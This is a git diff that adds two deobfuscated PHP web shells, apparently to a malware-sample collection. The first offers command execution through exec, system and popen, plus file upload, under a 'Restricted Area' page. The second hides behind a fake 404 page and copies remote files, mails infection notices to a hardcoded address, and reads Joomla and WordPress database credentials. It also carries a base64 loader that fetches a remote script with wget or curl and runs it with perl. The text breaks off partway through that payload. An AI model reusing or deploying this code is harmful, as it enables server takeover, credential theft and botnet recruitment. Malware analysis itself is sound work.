$temp = $this->parse_dir($dir); + foreach ($temp as $current2) + if (preg_match("/^{$regex}$/i", $current2['name'])) + $files[] = $current2; + unset ($regex, $dir, $temp, $current); + } + else if (@is_dir($current)) + { + $temp = $this->parse_dir($current); + foreach ($temp as $file) + $files[] = $file; + unset ($temp, $file); + } + else if (@file_exists($current)) + $files[] = array ('name' => $current, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($current, "/")) ? + substr($current, strrpos($current, "/") + 1) : $current), + 'type' => @is_link($current) && $this->options['followlinks'] == 0 ? 2 : 0, + 'ext' => substr($current, strrpos($current, ".")), 'stat' => stat($current)); + } + + chdir($pwd); + + unset ($current, $pwd); + + usort($files, array ("archive", "sort_files")); + + return $files; + } + + function parse_dir($dirname) + { + if ($this->options['storepaths'] == 1 && !preg_match("/^(\.+\/*)+$/", $dirname)) + $files = array (array ('name' => $dirname, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($dirname, "/")) ? + substr($dirname, strrpos($dirname, "/") + 1) : $dirname), 'type' => 5, 'stat' => stat($dirname))); + else + $files = array (); + $dir = @opendir($dirname); + + while ($file = @readdir($dir)) + { + $fullname = $dirname . "/" . $file; + if ($file == "." || $file == "..") + continue; + else if (@is_dir($fullname)) + { + if (empty ($this->options['recurse'])) + continue; + $temp = $this->parse_dir($fullname); + foreach ($temp as $file2) + $files[] = $file2; + } + else if (@file_exists($fullname)) + $files[] = array ('name' => $fullname, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($fullname, "/")) ? + substr($fullname, strrpos($fullname, "/") + 1) : $fullname), + 'type' => @is_link($fullname) && $this->options['followlinks'] == 0 ? 2 : 0, + 'ext' => substr($file, strrpos($file, ".")), 'stat' => stat($fullname)); + } + + @closedir($dir); + + return $files; + } + + function sort_files($a, $b) + { + if ($a['type'] != $b['type']) + if ($a['type'] == 5 || $b['type'] == 2) + return -1; + else if ($a['type'] == 2 || $b['type'] == 5) + return 1; + else if ($a['type'] == 5) + return strcmp(strtolower($a['name']), strtolower($b['name'])); + else if ($a['ext'] != $b['ext']) + return strcmp($a['ext'], $b['ext']); + else if ($a['stat'][7] != $b['stat'][7]) + return $a['stat'][7] > $b['stat'][7] ? -1 : 1; + else + return strcmp(strtolower($a['name']), strtolower($b['name'])); + return 0; + } + + function download_file() + { + if ($this->options['inmemory'] == 0) + { + $this->error[] = "Can only use download_file() if archive is in memory. Redirect to file otherwise, it is faster."; + return; + } + switch ($this->options['type']) + { + case "zip": + header("Content-Type: application/zip"); + break; + case "bzip": + header("Content-Type: application/x-bzip2"); + break; + case "gzip": + header("Content-Type: application/x-gzip"); + break; + case "tar": + header("Content-Type: application/x-tar"); + } + $header = "Content-Disposition: attachment; filename=\""; + $header .= strstr($this->options['name'], "/") ? substr($this->options['name'], strrpos($this->options['name'], "/") + 1) : $this->options['name']; + $header .= "\""; + header($header); + header("Content-Length: " . strlen($this->archive)); + header("Content-Transfer-Encoding: binary"); + header("Cache-Control: no-cache, must-revalidate, max-age=60"); + header("Expires: Sat, 01 Jan 2000 12:00:00 GMT"); + print($this->archive); + } +} + +class tar_file extends archive +{ + function tar_file($name) + { + $this->archive($name); + $this->options['type'] = "tar"; + } + + function create_tar() + { + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($this->files as $current) + { + if ($current['name'] == $this->options['name']) + continue; + if (strlen($current['name2']) > 99) + { + $path = substr($current['name2'], 0, strpos($current['name2'], "/", strlen($current['name2']) - 100) + 1); + $current['name2'] = substr($current['name2'], strlen($path)); + if (strlen($path) > 154 || strlen($current['name2']) > 99) + { + $this->error[] = "Could not add {$path}{$current['name2']} to archive because the filename is too long."; + continue; + } + } + $block = pack("a100a8a8a8a12a12a8a1a100a6a2a32a32a8a8a155a12", $current['name2'], sprintf("%07o", + $current['stat'][2]), sprintf("%07o", $current['stat'][4]), sprintf("%07o", $current['stat'][5]), + sprintf("%011o", $current['type'] == 2 ? 0 : $current['stat'][7]), sprintf("%011o", $current['stat'][9]), + " ", $current['type'], $current['type'] == 2 ? @readlink($current['name']) : "", "ustar ", " ", + "Unknown", "Unknown", "", "", !empty ($path) ? $path : "", ""); + + $checksum = 0; + for ($i = 0; $i < 512; $i++) + $checksum += ord(substr($block, $i, 1)); + $checksum = pack("a8", sprintf("%07o", $checksum)); + $block = substr_replace($block, $checksum, 148, 8); + + if ($current['type'] == 2 || $current['stat'][7] == 0) + $this->add_data($block); + else if ($fp = @fopen($current['name'], "rb")) + { + $this->add_data($block); + while ($temp = fread($fp, 1048576)) + $this->add_data($temp); + if ($current['stat'][7] % 512 > 0) + { + $temp = ""; + for ($i = 0; $i < 512 - $current['stat'][7] % 512; $i++) + $temp .= "\0"; + $this->add_data($temp); + } + fclose($fp); + } + else + $this->error[] = "Could not open file {$current['name']} for reading. It was not added."; + } + + $this->add_data(pack("a1024", "")); + + chdir($pwd); + + return 1; + } + + function extract_files() + { + $pwd = getcwd(); + chdir($this->options['basedir']); + + if ($fp = $this->open_archive()) + { + if ($this->options['inmemory'] == 1) + $this->files = array (); + + while ($block = fread($fp, 512)) + { + $temp = unpack("a100name/a8mode/a8uid/a8gid/a12size/a12mtime/a8checksum/a1type/a100symlink/a6magic/a2temp/a32temp/a32temp/a8temp/a8temp/a155prefix/a12temp", $block); + $file = array ( + 'name' => $temp['prefix'] . $temp['name'], + 'stat' => array ( + 2 => $temp['mode'], + 4 => octdec($temp['uid']), + 5 => octdec($temp['gid']), + 7 => octdec($temp['size']), + 9 => octdec($temp['mtime']), + ), + 'checksum' => octdec($temp['checksum']), + 'type' => $temp['type'], + 'magic' => $temp['magic'], + ); + if ($file['checksum'] == 0x00000000) + break; + else if (substr($file['magic'], 0, 5) != "ustar") + { + $this->error[] = "This script does not support extracting this type of tar file."; + break; + } + $block = substr_replace($block, " ", 148, 8); + $checksum = 0; + for ($i = 0; $i < 512; $i++) + $checksum += ord(substr($block, $i, 1)); + if ($file['checksum'] != $checksum) + $this->error[] = "Could not extract from {$this->options['name']}, it is corrupt."; + + if ($this->options['inmemory'] == 1) + { + $file['data'] = fread($fp, $file['stat'][7]); + fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 0 : (512 - $file['stat'][7] % 512)); + unset ($file['checksum'], $file['magic']); + $this->files[] = $file; + } + else if ($file['type'] == 5) + { + if (!is_dir($file['name'])) + mkdir($file['name'], $file['stat'][2]); + } + else if ($this->options['overwrite'] == 0 && file_exists($file['name'])) + { + $this->error[] = "{$file['name']} already exists."; + continue; + } + else if ($file['type'] == 2) + { + symlink($temp['symlink'], $file['name']); + chmod($file['name'], $file['stat'][2]); + } + else if ($new = @fopen($file['name'], "wb")) + { + fwrite($new, fread($fp, $file['stat'][7])); + fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 0 : (512 - $file['stat'][7] % 512)); + fclose($new); + chmod($file['name'], $file['stat'][2]); + } + else + { + $this->error[] = "Could not open {$file['name']} for writing."; + continue; + } + chown($file['name'], $file['stat'][4]); + chgrp($file['name'], $file['stat'][5]); + touch($file['name'], $file['stat'][9]); + unset ($file); + } + } + else + $this->error[] = "Could not open file {$this->options['name']}"; + + chdir($pwd); + } + + function open_archive() + { + return @fopen($this->options['name'], "rb"); + } +} + +class gzip_file extends tar_file +{ + function gzip_file($name) + { + $this->tar_file($name); + $this->options['type'] = "gzip"; + } + + function create_gzip() + { + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($fp = gzopen($this->options['name'], "wb{$this->options['level']}")) + { + fseek($this->archive, 0); + while ($temp = fread($this->archive, 1048576)) + gzwrite($fp, $temp); + gzclose($fp); + chdir($pwd); + } + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = gzencode($this->archive, $this->options['level']); + + return 1; + } + + function open_archive() + { + return @gzopen($this->options['name'], "rb"); + } +} + +class bzip_file extends tar_file +{ + function bzip_file($name) + { + $this->tar_file($name); + $this->options['type'] = "bzip"; + } + + function create_bzip() + { + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($fp = bzopen($this->options['name'], "wb")) + { + fseek($this->archive, 0); + while ($temp = fread($this->archive, 1048576)) + bzwrite($fp, $temp); + bzclose($fp); + chdir($pwd); + } + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = bzcompress($this->archive, $this->options['level']); + + return 1; + } + + function open_archive() + { + return @bzopen($this->options['name'], "rb"); + } +} + +class zip_file extends archive +{ + function zip_file($name) + { + $this->archive($name); + $this->options['type'] = "zip"; + } + + function create_zip() + { + $files = 0; + $offset = 0; + $central = ""; + + if (!empty ($this->options['sfx'])) + if ($fp = @fopen($this->options['sfx'], "rb")) + { + $temp = fread($fp, filesize($this->options['sfx'])); + fclose($fp); + $this->add_data($temp); + $offset += strlen($temp); + unset ($temp); + } + else + $this->error[] = "Could not open sfx module from {$this->options['sfx']}."; + + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($this->files as $current) + { + if ($current['name'] == $this->options['name']) + continue; + + $timedate = explode(" ", date("Y n j G i s", $current['stat'][9])); + $timedate = ($timedate[0] - 1980 << 25) | ($timedate[1] << 21) | ($timedate[2] << 16) | + ($timedate[3] << 11) | ($timedate[4] << 5) | ($timedate[5]); + + $block = pack("VvvvV", 0x04034b50, 0x000A, 0x0000, (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate); + + if ($current['stat'][7] == 0 && $current['type'] == 5) + { + $block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000); + $block .= $current['name2'] . "/"; + $this->add_data($block); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset); + $central .= $current['name2'] . "/"; + $files++; + $offset += (31 + strlen($current['name2'])); + } + else if ($current['stat'][7] == 0) + { + $block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000); + $block .= $current['name2']; + $this->add_data($block); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset); + $central .= $current['name2']; + $files++; + $offset += (30 + strlen($current['name2'])); + } + else if ($fp = @fopen($current['name'], "rb")) + { + $temp = fread($fp, $current['stat'][7]); + fclose($fp); + $crc32 = crc32($temp); + if (!isset($current['method']) && $this->options['method'] == 1) + { + $temp = gzcompress($temp, $this->options['level']); + $size = strlen($temp) - 6; + $temp = substr($temp, 2, $size); + } + else + $size = strlen($temp); + $block .= pack("VVVvv", $crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000); + $block .= $current['name2']; + $this->add_data($block); + $this->add_data($temp); + unset ($temp); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + $crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, 0x00000000, $offset); + $central .= $current['name2']; + $files++; + $offset += (30 + strlen($current['name2']) + $size); + } + else + $this->error[] = "Could not open file {$current['name']} for reading. It was not added."; + } + + $this->add_data($central); + + $this->add_data(pack("VvvvvVVv", 0x06054b50, 0x0000, 0x0000, $files, $files, strlen($central), $offset, + !empty ($this->options['comment']) ? strlen($this->options['comment']) : 0x0000)); + + if (!empty ($this->options['comment'])) + $this->add_data($this->options['comment']); + + chdir($pwd); + + return 1; + } +} + +function copy_paste($c,$s,$d){ + if(is_dir($c.$s)) { + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) { + if (($f != ".") and ($f != "..")) { + copy_paste($c.$s.DS,$f, $d.$s.DS); + } + } + } elseif(is_file($c.$s)) { + @copy($c.$s, $d.$s); + } +} + +function system_custom($in) { + + $out = ''; + $system = false ; + if (cust_function_exists('exec')) { + $system = true ; + @exec($in,$out); + $out = @join("\n",$out); + } elseif (cust_function_exists('passthru')) { + $system = true ; + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (cust_function_exists('system')) { + $system = true ; + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (cust_function_exists('shell_exec')) { + $system = true ; + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $system = true ; + $out = ""; + while(!@feof($f)) + $out .= fread($f,1024); + pclose($f); + } + + if($system) { + return $out; + } + + $commands = explode(";", $in) ; + + $out = '' ; + $path = '' ; + + if($commands) { + foreach($commands as $command) { + $command_parts = explode(" ", $command) ; + $command_head = $command_parts[0] ; + $params = array() ; + if(count($command_parts) > 1) { + for($i=1;$i 1) { + $archive = new gzip_file($params[0]); + $archive->set_options(array('basedir' => $path, 'overwrite' => 1, 'level' => 1)); + $archive->add_files(array($params[1])); + $archive->create_archive(); + } + break; + case "zip": + if(class_exists('ZipArchive') && count($params) > 1) { + $zip = new ZipArchive(); + if ($zip->open($params[0], 1)) { + foreach($params as $k=>$param) { + if($k == 0 || $param == '..') + continue; + if(@is_file($param)) + $zip->addFile($param, $param); + elseif(@is_dir($param)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($param.DS)); + foreach ($iterator as $key=>$value) { + $zip->addFile(realpath($key), $key); + } + } + } + $zip->close(); + } + } + break; + case "unzip": + if(class_exists('ZipArchive') && count($params) > 0) { + $zip = new ZipArchive(); + foreach($params as $k=>$param) { + if($zip->open($param)) { + $zip->extractTo($path); + $zip->close(); + } + } + } + break; + case "cp": + smartCopy($params[0], $params[1]) ; + break; + case "mv": + @rename($params[0], $params[1]) ; + break; + case "rm": + foreach($params as $param) { + if(!preg_match("/^-/", $param)) { + if($param == '..') + continue; + $param = urldecode($param); + if(is_dir($param)) { + deleteDir($param); + } elseif(is_file($param)) { + @unlink($param); + } + } + } + break; + case "uname": + $out = php_uname(preg_replace("/^-/", "", $params[0])) ; + break; + case "find": + $out = scandir_rec($params[0], true, 1) ; + $out = implode("\n", $out) ; + break; + case "ls": + if(isset($params[0]) && $params[0] == '-F') { + $_path = $path ; + if(isset($params[1])) { + $_path = $params[1] ; + } + $out = glob($_path . '/*' , GLOB_ONLYDIR); + if(!empty($out)) { + foreach($out as $k=>$v) { + $out[$k] = preg_replace("/^" . preg_quote($_path.DS,DS) . "/","",$v) . DS ; + } + } + $out = implode("\n", $out) ; + } else { + $_path = $path ; + if(isset($params[1])) { + $_path = $params[1] ; + } + $out = glob($_path . '/*'); + if(!empty($out)) { + foreach($out as $k=>$v) { + $out[$k] = preg_replace("/^" . preg_quote($path,DS) . "/","",$v) ; + } + } + $out = implode("\n", $out) ; + } + break; + case "mkdir": + @mkdir($params[0]) ; + break; + case "chmod": + @chmod($params[1], $params[0]) ; + break; + case "phpversion": + $out = phpversion() ; + break; + case "wso_version": + $out = "2.4"; + break; + case "safemode": + $out = @ini_get('safe_mode') ; + break; + case 'pwd': + $out = getcwd() ; + break; + default: + break; + } + } + } + + return $out ; + +} + +print ""; +print "

Restricted

"; +print "

Area

"; +print "

"; + +if(isset($_POST['_cwd'])) { + $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); +} else { + $currentWD = '' ; +} +if(isset($_POST['_cmd'])) { + $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); +} else { + $currentCMD = '' ; +} + +$UName = system_custom('uname -a'); +$SCWD = system_custom('pwd'); +$UserID = system_custom('id'); + +if( $currentWD == "" ) { + $currentWD = $SCWD; +} + +print ""; +print ""; +print ""; +print ""; +print ""; +print "
?:".(isset($_SERVER['REMOTE_HOST'])?$_SERVER['REMOTE_HOST']:"")." (".(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:"").")
s is:".(isset($_SERVER['SERVER_SIGNATURE'])?$_SERVER['SERVER_SIGNATURE']:"")."
ce e?:$UName
wtf:$UserID
"; + +print "

"; + +if( isset($_POST['_act']) && $_POST['_act'] == "List files!" ) { + $currentCMD = "ls -la"; +} + +print "
"; + +print ""; +print ""; + +print ""; +print ""; + +print ""; +print ""; + +print "
Execute command:
Change directory:
Upload file:


"; + +$currentCMD = str_replace("\\\"","\"",$currentCMD); +$currentCMD = str_replace("\\\'","\'",$currentCMD); + +if( isset($_POST['_act']) && $_POST['_act'] == "Upload!" ) { + if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { + print "
Error while uploading file!
"; + } else { + print "
";
+        if(!@move_uploaded_file($_FILES['_upl']['tmp_name'], $currentWD."/".$_FILES['_upl']['name'])) {
+            $out = system_custom("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        }
+        echo $out ;
+        print "
File uploaded successfully!
"; + } +} else { + print "\n\n\n
\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    $out = system_custom($currentCMD);
+    echo $out ;
+    print "\n
\n\n\n

Command completed
"; +} + +exit; + +?> diff --git a/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php new file mode 100644 index 0000000..378e78d --- /dev/null +++ b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php @@ -0,0 +1,506 @@ +user = get_current_user(); + $this->os = $this->check("os"); + $this->type = $this->check("cmd"); + if (!isset($_GET['1180'])) { + if (isset($_GET['x1'])) { + $this->form(); + echo ($this->os == "windows") ? '
' . $this->exe('dir') . '
' : '
' . $this->exe('ls -la') . '
'; + } else { + header("HTTP/1.0 404 Not Found"); + header("Status: 404 Not Found"); + echo "

Error 404 Not Found

"; + echo "The page that you have requested could not be found."; + die(); + exit(); + } + } else { + if (isset($_GET['x'])) { + switch ($_GET['x']) { + case 'get': + if (isset($_GET['file'])) { + $file = urldecode($_GET['file']); + $name = (isset($_GET['name'])) ? $_GET['name'] : "px.php"; + $code = file_get_contents($file); + $myfile = fopen($name, "w+"); + fwrite($myfile, $code); + fclose($myfile); + } + break; + case 'plbot': + $this->plBot(); + break; + case 'clear': + $this->delete("px.php"); + $this->delete("pl.php"); + break; + case 'read': + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + $this->setDB($path); + } + break; + case 'jdb': + $this->joomlaDb(); + break; + case 'wpdb': + $this->wpDb(); + break; + case 'mail': + $mail = (isset($_GET['to'])) ? urldecode($_GET['to']) : "setoran.target26@gmail.com"; + $host = $_SERVER["HTTP_HOST"]; + $uri = $_SERVER["REQUEST_URI"]; + $serv = gethostbyname($_SERVER['SERVER_ADDR']); + $addr = gethostbyname($_SERVER['REMOTE_ADDR']); + mail($mail, "kiriman bos " . $host . $uri, "Url:" . $host . $uri . " nIp :$servn Ip injector: $addr"); + break; + case 'clone': + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + if (strstr($path, ",")) { + $data = explode(",", $path); + if (is_array($data) && count($data) > 0) { + $data = array_filter($data); + if (count($data) > 0) { + foreach ($data as $k) { + $this->setClone($k); + } + } + } + } else { + $path = urldecode($_GET['path']); + $this->setClone($path); + } + } else { + $this->setClone('../.inc.php'); + $this->setClone('../../.inc.php'); + } + break; + case 'patch': + $lock = (isset($_GET['lock'])) ? 1 : 0; + $force = (isset($_GET['force'])) ? 1 : 0; + $path = ""; + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + if (strstr($path, ",")) { + $path = explode(",", $path); + } + } + if (isset($_GET['allow'])) { + $files = urldecode($_GET['allow']); + if (strstr($files, ",")) { + $file = explode(",", $files); + $this->setPatch($user, $file, $lock, $path, $force); + } else { + $this->setPatch($user, $files, $lock, $path, $force); + } + } else { + $this->setPatch($user, "", $lock, $path, $force); + } + break; + case 'chmod': + if (isset($_GET['dir'])) { + $dir = $_GET['dir']; + if ($dir == 1) { + chmod("./", 0555); + } else if ($dir == 2) { + chmod("./", 0555); + chmod("../", 0555); + } else if ($dir == 3) { + chmod("./", 0555); + chmod("../", 0555); + chmod("../../", 0555); + } else { + $dir = str_replace("|", "/", $dir); + chmod($dir, 0555); + } + } + break; + case 'die': + $source = $_SERVER['SCRIPT_FILENAME']; + @unlink($source); + break; + } + } else { + if (isset($_GET['del'])) { + $del = $_GET['del']; + if (strstr($del, ",")) { + $data = explode(",", $del); + if (is_array($data) && count($data) > 0) { + $data = array_filter($data); + foreach ($data as $k) { + $this->delete($k); + } + } + } else { + $this->delete($del); + } + } + $this->getForm(); + } + } + } + private function plBot() { + $code = "PD9waHANCiR1cmwgPSAoaXNzZXQoJF9HRVRbJ3VybCddKSkgPyB1cmxkZWNvZGUoJF9HRVRbJ3VybCddKSA6ICJodHRwOi8vd3d3LmhvdGVscmlzdG9yYW50ZWxlcGFudG8uaXQvZm9ybS8vLi4uL3JvYm90LnR4 + +dCI7DQoNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCglAZXhlYygnd2dldCAnLiR1cmwuJyAtTyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV + +4ZWMoJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdsd3AtZG93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3 + +Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gL + +WZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnR0VUICcuJHVybC4nID5y + +b2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO3dnZXQgJy4kdXJsLicgLU8gcm9ib3Q + +udHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO2N1cmwgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYi + +oudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3Rtc + +DtseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7ZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVy + +bC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO0dFVCAnLiR1cmwuJyA + ++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdybSAtcmYgaW5kZXgucGhwLionKTsNCglAZXhlYygnY2QgL3RtcDtybSAtcmYgcm9iKi50eHQnKT + +sNCglAZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBleGVjKCdybSAtcmYgcm9iKi50eHQqJyk7DQp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZ + +WxsX2V4ZWMnKSl7DQoJQHNoZWxsX2V4ZWMoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjdXJsICcu + +JHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJ + +vYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC + +1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ0dFV + +CAnLiR1cmwuJyA + ++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDt3Z2V0ICcuJH + +VybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtjdXJsICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgc + +m9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJv + +YioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9 + +leGVjKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtHRVQgJy4kdXJsLi + +cgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc2hlbGxfZXhlYygnY2QgL + +3RtcDtybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9i + +Ki50eHQqJyk7DQp9ZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KCUBzeXN0ZW0oJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2I + +qLnR4dCcpOw0KCUBzeXN0ZW0oJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2x3cC1kb3dubG9hZCAtYSAnLi + +R1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O + 